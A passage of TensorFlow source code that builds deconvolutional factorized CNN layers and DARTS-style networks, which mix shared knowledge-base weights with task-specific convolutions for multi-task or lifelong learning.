skip_connect_in, skip_connect_out = next_skip_connect
assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
else:
skip_connect_in, skip_connect_out = -1, -1
if layer_cnt == skip_connect_out:
processed_skip_connect_input = layers_for_skip[skip_connect_in]
for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
else:
processed_skip_connect_input = None
if layer_cnt == 0:
if control_flag[0] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[1] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[2] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[3] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif (not cnn_sharing[layer_cnt]):
layer_tmp, para_tmp = new_cnn_layer(layer_input=net_input, k_size=k_sizes[2*layer_cnt:2*(layer_cnt+1)]+ch_sizes[layer_cnt:layer_cnt+2], stride_size=[1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], activation_fn=cnn_activation_fn, weight=cnn_params[2*layer_cnt], bias=cnn_params[2*layer_cnt+1], padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, trainable=trainable)
else:
if control_flag[0] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[1] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=None, KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[2] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=cnn_KB_params[layer_cnt], TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif control_flag[3] and cnn_sharing[layer_cnt]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_gen_para_tmp, highway_para_tmp = new_ELLA_cnn_deconv_tensordot_layer(cnn_model[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], cnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], cnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=cnn_activation_fn, para_activation_fn=cnn_para_activation_fn, KB_param=None, TS_param=cnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pool=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, highway_connect_type=highway_connect_type, highway_W=highway_para_tmp[0], highway_b=highway_para_tmp[1], trainable=trainable, trainable_KB=trainable_KB)
elif (not cnn_sharing[layer_cnt]):
layer_tmp, para_tmp = new_cnn_layer(layer_input=cnn_model[layer_cnt-1], k_size=k_sizes[2*layer_cnt:2*(layer_cnt+1)]+ch_sizes[layer_cnt:layer_cnt+2], stride_size=[1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], activation_fn=cnn_activation_fn, weight=cnn_params[2*layer_cnt], bias=cnn_params[2*layer_cnt+1], padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], skip_connect_input=processed_skip_connect_input, trainable=trainable)
cnn_model.append(layer_tmp)
layers_for_skip.append(layer_tmp)
cnn_KB_to_return = cnn_KB_to_return + KB_para_tmp
cnn_TS_to_return = cnn_TS_to_return + TS_para_tmp
cnn_params_to_return = cnn_params_to_return + para_tmp
cnn_gen_params = cnn_gen_params + cnn_gen_para_tmp
cnn_highway_params_to_return = cnn_highway_params_to_return + highway_para_tmp
if layer_cnt == skip_connect_out:
next_skip_connect = None
#### flattening output
output_dim = [int(cnn_model[-1].shape[1]*cnn_model[-1].shape[2]*cnn_model[-1].shape[3])]
cnn_model.append(tf.reshape(cnn_model[-1], [-1, output_dim[0]]))
#### add dropout layer
if dropout:
cnn_model.append(tf.nn.dropout(cnn_model[-1], dropout_prob))
## add fc layers
fc_model, fc_params = new_fc_net(cnn_model[-1], fc_sizes, activation_fn=fc_activation_fn, params=fc_params, output_type=output_type, tensorboard_name_scope='fc_net', trainable=trainable)
#return (cnn_model+fc_model, cnn_KB_params, cnn_TS_params, cnn_gen_params, cnn_params_to_return, cnn_highway_params_to_return, fc_params)
return (cnn_model+fc_model, cnn_KB_to_return, cnn_TS_to_return, cnn_gen_params, cnn_params_to_return, cnn_highway_params_to_return, fc_params)
#### function to generate DARTS-based network for selective sharing on DF-CNN
def new_darts_dfcnn_layer(layer_input, k_size, ch_size, stride_size, KB_size, TS_size, TS_stride_size, layer_num, task_num, activation_fn=tf.nn.relu, para_activation_fn=tf.nn.relu, KB_param=None, TS_param=None, conv_param=None, select_param=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pooling=False, pool_size=None, trainable=True, skip_connect_input=None, name_scope='darts_dfcnn_layer', use_numpy_var_in_graph=False):
with tf.name_scope(name_scope):
## init DF-CNN KB params
if KB_param is None or (type(KB_param) == np.ndarray and not use_numpy_var_in_graph):
KB_param = new_ELLA_KB_param([1, KB_size[0], KB_size[0], KB_size[1]], layer_num, task_num, KB_reg_type, KB_param, trainable=trainable)
## init DF-CNN task-specific mapping params
if TS_param is None or (type(TS_param) == np.ndarray and not use_numpy_var_in_graph):
TS_param = new_ELLA_cnn_deconv_tensordot_TS_param([[TS_size[0], TS_size[0], TS_size[1], KB_size[1]], [1, 1, 1, TS_size[1]], [TS_size[1], ch_size[0], ch_size[1]], [ch_size[1]]], layer_num, task_num, TS_reg_type, [None, None, None, None] if TS_param is None else TS_param, trainable=trainable)
## init task-specific conv params
if conv_param is None:
conv_param = [new_weight(shape=k_size+ch_size, trainable=trainable), new_bias(shape=[ch_size[-1]], trainable=trainable)]
else:
if conv_param[0] is None or (type(conv_param[0]) == np.ndarray and not use_numpy_var_in_graph):
conv_param[0] = new_weight(shape=k_size+ch_size, init_tensor=conv_param[0], trainable=trainable)
if conv_param[1] is None or (type(conv_param[1]) == np.ndarray and not use_numpy_var_in_graph):
conv_param[1] = new_bias(shape=[ch_size[-1]], init_tensor=conv_param[1], trainable=trainable)
## init DARTS-selection params
if select_param is None:
select_param = new_weight(shape=[2], init_tensor=np.zeros(2, dtype=np.float32), trainable=trainable)
elif (type(select_param) == np.ndarray) and not use_numpy_var_in_graph:
select_param = new_weight(shape=[2], init_tensor=select_param, trainable=trainable)
with tf.name_scope('DFCNN_param_gen'):
para_tmp = tf.add(tf.nn.conv2d_transpose(KB_param, TS_param[0], [1, k_size[0], k_size[1], TS_size[1]], strides=[1, TS_stride_size[0], TS_stride_size[1], 1]), TS_param[1])
para_tmp = tf.reshape(para_tmp, [k_size[0], k_size[1], TS_size[1]])
if para_activation_fn is not None:
para_tmp = para_activation_fn(para_tmp)
W = tf.tensordot(para_tmp, TS_param[2], [[2], [0]])
b = TS_param[3]
mixing_weight = tf.reshape(tf.nn.softmax(select_param), [2,1])
shared_conv_layer = tf.nn.conv2d(layer_input, W, strides=stride_size, padding=padding_type) + b
TS_conv_layer = tf.nn.conv2d(layer_input, conv_param[0], strides=stride_size, padding=padding_type) + conv_param[1]
if skip_connect_input is not None:
shape1, shape2 = shared_conv_layer.get_shape().as_list(), skip_connect_input.get_shape().as_list()
assert (len(shape1) == len(shape2)), "Shape of layer's output and input of skip connection do not match!"
assert (all([(x==y) for (x, y) in zip(shape1, shape2)])), "Shape of layer's output and input of skip connection do NOT match!"
shared_conv_layer = shared_conv_layer + skip_connect_input
TS_conv_layer = TS_conv_layer + skip_connect_input
if not (activation_fn is None):
shared_conv_layer = activation_fn(shared_conv_layer)
TS_conv_layer = activation_fn(TS_conv_layer)
mixed_conv_temp = tf.tensordot(tf.stack([TS_conv_layer, shared_conv_layer], axis=4), mixing_weight, axes=[[4], [0]])
conv_layer = tf.reshape(mixed_conv_temp, mixed_conv_temp.get_shape()[0:-1])
if max_pooling and (pool_size[1] > 1 or pool_size[2] > 1):
layer = tf.nn.max_pool(conv_layer, ksize=pool_size, strides=pool_size, padding=padding_type)
else:
layer = conv_layer
return (layer, [KB_param], TS_param, conv_param, [select_param])
def new_darts_dfcnn_net(net_input, k_sizes, ch_sizes, stride_sizes, dfcnn_KB_sizes, dfcnn_TS_sizes, dfcnn_TS_stride_sizes, activation_fn=tf.nn.relu, dfcnn_TS_activation_fn=tf.nn.relu, dfcnn_KB_params=None, dfcnn_TS_params=None, cnn_TS_params=None, select_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, flat_output=False, trainable=True, task_index=0, skip_connections=[], use_numpy_var_in_graph=False):
_num_TS_param_per_layer = 4
num_conv_layers = [len(k_sizes)//2, len(ch_sizes)-1, len(stride_sizes)//2, len(dfcnn_KB_sizes)//2, len(dfcnn_TS_sizes)//2, len(dfcnn_TS_stride_sizes)//2]
assert (all([(num_conv_layers[i]==num_conv_layers[i+1]) for i in range(len(num_conv_layers)-1)])), "Parameters related to conv layers are wrong!"
num_conv_layers = num_conv_layers[0]
## first element : make new KB&TS / second element : make new TS / third element : not make new para / fourth element : make new KB
control_flag = [(dfcnn_KB_params is None and dfcnn_TS_params is None), (not (dfcnn_KB_params is None) and (dfcnn_TS_params is None)), not (dfcnn_KB_params is None or dfcnn_TS_params is None), ((dfcnn_KB_params is None) and not (dfcnn_TS_params is None))]
if cnn_TS_params is None:
cnn_TS_params = [None for _ in range(2*num_conv_layers)]
else:
assert(len(cnn_TS_params) == 2*num_conv_layers), "Check given parameters!"
if select_params is None:
select_params = [None for _ in range(num_conv_layers)]
layers_for_skip, next_skip_connect = [net_input], None
layers, dfcnn_shared_params_return, dfcnn_TS_params_return, cnn_TS_params_return, select_params_return = [], [], [], [], []
with tf.name_scope('DARTS_DFCNN_net'):
for layer_cnt in range(num_conv_layers):
next_skip_connect = skip_connections.pop(0) if (len(skip_connections) > 0 and next_skip_connect is None) else None
if next_skip_connect is not None:
skip_connect_in, skip_connect_out = next_skip_connect
assert (skip_connect_in > -1 and skip_connect_out > -1), "Given skip connection has error (try connecting non-existing layer)"
else:
skip_connect_in, skip_connect_out = -1, -1
if layer_cnt == skip_connect_out:
processed_skip_connect_input = layers_for_skip[skip_connect_in]
for layer_cnt_tmp in range(skip_connect_in, skip_connect_out):
if max_pool and (pool_sizes[2*layer_cnt_tmp]>1 or pool_sizes[2*layer_cnt_tmp+1]>1):
processed_skip_connect_input = tf.nn.max_pool(processed_skip_connect_input, ksize=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], strides=[1]+pool_sizes[2*layer_cnt_tmp:2*(layer_cnt_tmp+1)]+[1], padding=padding_type)
else:
processed_skip_connect_input = None
if layer_cnt == 0:
if control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=None, TS_param=None, conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
elif control_flag[1]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=dfcnn_KB_params[layer_cnt], TS_param=None, conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
elif control_flag[2]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=dfcnn_KB_params[layer_cnt], TS_param=dfcnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
elif control_flag[3]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(net_input, k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=None, TS_param=dfcnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
else:
if control_flag[0]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=None, TS_param=None, conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
elif control_flag[1]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=dfcnn_KB_params[layer_cnt], TS_param=None, conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
elif control_flag[2]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=dfcnn_KB_params[layer_cnt], TS_param=dfcnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
elif control_flag[3]:
layer_tmp, KB_para_tmp, TS_para_tmp, cnn_TS_para_tmp, select_para_tmp = new_darts_dfcnn_layer(layers[layer_cnt-1], k_sizes[2*layer_cnt:2*(layer_cnt+1)], ch_sizes[layer_cnt:layer_cnt+2], [1]+stride_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], dfcnn_KB_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_sizes[2*layer_cnt:2*(layer_cnt+1)], dfcnn_TS_stride_sizes[2*layer_cnt:2*(layer_cnt+1)], layer_cnt, task_index, activation_fn=activation_fn, para_activation_fn=dfcnn_TS_activation_fn, KB_param=None, TS_param=dfcnn_TS_params[_num_TS_param_per_layer*layer_cnt:_num_TS_param_per_layer*(layer_cnt+1)], conv_param=cnn_TS_params[2*layer_cnt:2*(layer_cnt+1)], select_param=select_params[layer_cnt], KB_reg_type=KB_reg_type, TS_reg_type=TS_reg_type, padding_type=padding_type, max_pooling=max_pool, pool_size=[1]+pool_sizes[2*layer_cnt:2*(layer_cnt+1)]+[1], trainable=trainable, skip_connect_input=processed_skip_connect_input, use_numpy_var_in_graph=use_numpy_var_in_graph)
layers.append(layer_tmp)
layers_for_skip.append(layer_tmp)
dfcnn_shared_params_return = dfcnn_shared_params_return + KB_para_tmp
dfcnn_TS_params_return = dfcnn_TS_params_return + TS_para_tmp
cnn_TS_params_return = cnn_TS_params_return + cnn_TS_para_tmp
select_params_return = select_params_return + select_para_tmp
if layer_cnt == skip_connect_out:
next_skip_connect = None
#### flattening output
if flat_output:
output_dim = [int(layers[-1].shape[1]*layers[-1].shape[2]*layers[-1].shape[3])]
layers.append(tf.reshape(layers[-1], [-1, output_dim[0]]))
else:
output_dim = layers[-1].shape[1:]
#### add dropout layer
if dropout:
layers.append(tf.nn.dropout(layers[-1], dropout_prob))
return (layers, dfcnn_shared_params_return, dfcnn_TS_params_return, cnn_TS_params_return, select_params_return, output_dim)
def new_darts_dfcnn_fc_net(net_input, k_sizes, ch_sizes, stride_sizes, fc_sizes, dfcnn_KB_sizes, dfcnn_TS_sizes, dfcnn_TS_stride_sizes, cnn_activation_fn=tf.nn.relu, dfcnn_TS_activation_fn=tf.nn.relu, fc_activation_fn=tf.nn.relu, dfcnn_KB_params=None, dfcnn_TS_params=None, cnn_TS_params=None, select_params=None, fc_params=None, KB_reg_type=None, TS_reg_type=None, padding_type='SAME', max_pool=False, pool_sizes=None, dropout=False, dropout_prob=None, output_type=None, trainable=True, task_index=0, skip_connections=[], use_numpy_var_in_graph=False):
